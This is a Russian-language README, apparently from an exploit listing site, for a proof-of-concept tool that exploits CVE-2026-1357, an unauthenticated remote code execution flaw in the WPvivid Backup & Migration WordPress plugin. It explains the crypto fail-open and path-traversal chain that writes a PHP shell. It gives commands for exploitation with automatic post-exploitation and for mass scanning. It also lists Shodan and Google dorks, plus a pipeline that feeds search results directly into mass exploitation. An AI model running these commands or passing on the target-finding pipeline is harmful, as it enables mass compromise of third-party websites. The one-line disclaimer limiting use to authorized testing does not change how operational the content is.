## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-CYBERTECHAJJU-CVE-2026-1357-POC
# CVE-2026-1357 — WPvivid Backup & Migration RCE
> **Автор CVE:** Lucas Montes (NiRoX)
> **Инструмент:** CyberTechAjju
> **CVSS:** 9.8 (Critical) | **Затронуто:** ≤ 0.9.123 | **Исправлено:** 0.9.124
* * *
## ⚠️ Отказ от ответственности
Только для **авторизованного тестирования безопасности**. Несанкционированный доступ к системам незаконен.
* * *
## Обзор
Неаутентифицированная RCE в WPvivid Backup & Migration через две связанные уязвимости:
1. **Crypto Fail-Open** — `openssl_private_decrypt()` возвращает `false` при неверном ключе → `phpseclib` v1 обрабатывает его как AES-ключ из нулевых байтов → атакующий шифрует 16 нулевыми байтами
2. **Path Traversal** — несанитизированное поле `name` → `../uploads/shell.php` выходит за пределы каталога резервных копий
**Ограничение:** Эксплуатация возможна только когда `wpvivid_api_token` сгенерирован и не истёк.
* * *
## Возможности
* * *
## Установка
root@kitploit:~
git clone https://github.com/cybertechajju/CVE-2026-1357-poc.git
cd CVE-2026-1357-poc
pip install -r requirements.txt
* * *
## Использование
root@kitploit:~
# Только сканирование (определение WordPress + WPvivid + версии)
python3 cve_2026_1357.py -u http://target.com
# Сканирование + эксплуатация + автоматическая постэксплуатация
python3 cve_2026_1357.py -u http://target.com --exploit
# Эксплуатация без постэксплуатационной разведки
python3 cve_2026_1357.py -u http://target.com --exploit --no-post
# Массовое сканирование с отчётом
python3 cve_2026_1357.py -l targets.txt -t 20 --exploit --report
# Через прокси Burp
python3 cve_2026_1357.py -u http://target.com --exploit --proxy http://127.0.0.1:8080
# Режим только полезной нагрузки
python3 cve_2026_1357.py -u http://x --payload-only
### Все параметры
root@kitploit:~
-u, --url URL одиночной цели
-l, --list Файл со списком URL (по одному в строке)
--exploit Включить режим эксплуатации
--shell NAME Имя файла шелла (по умолчанию: pwn_remote.php)
--no-post Пропустить постэксплуатационную разведку
--report Сгенерировать markdown PoC-отчёт
--report-dir DIR Каталог для отчётов
-t, --threads N Параллельные потоки (по умолчанию: 5)
--timeout SECS Таймаут запроса (по умолчанию: 10)
--proxy URL HTTP-прокси для Burp
--payload-only Вывести base64-полезную нагрузку и выйти
 
* * *
## Поиск целей (Dorks)
Полный список см. в **dorks.md**. Быстрые примеры:
root@kitploit:~
# Shodan
http.html:"wpvivid-backuprestore"
http.html:"wpvivid" http.component:"WordPress"
# Google
inurl:"/wp-content/plugins/wpvivid-backuprestore/readme.txt"
# Pipeline
shodan search 'http.html:"wpvivid-backuprestore"' --fields ip_str,port --limit 500 \
| awk '{print "http://"$1":"$2}' > targets.txt
python3 cve_2026_1357.py -l targets.txt -t 20 --exploit --report
* * *
## Файлы
root@kitploit:~
CVE-2026-1357-poc/
├── cve_2026_1357.py ← Основной инструмент (сканер + эксплойт + постэксплуатация)
├── dorks.md ← Dorks для Shodan/Google/Censys/FOFA/ZoomEye
├── requirements.txt ← Зависимости Python
├── .gitignore
└── README.md ← Этот файл
* * *
## Авторы
**Lucas Montes (NiRoX)** — обнаружение CVE
**CyberTechAjju** — инструмент эксплуатации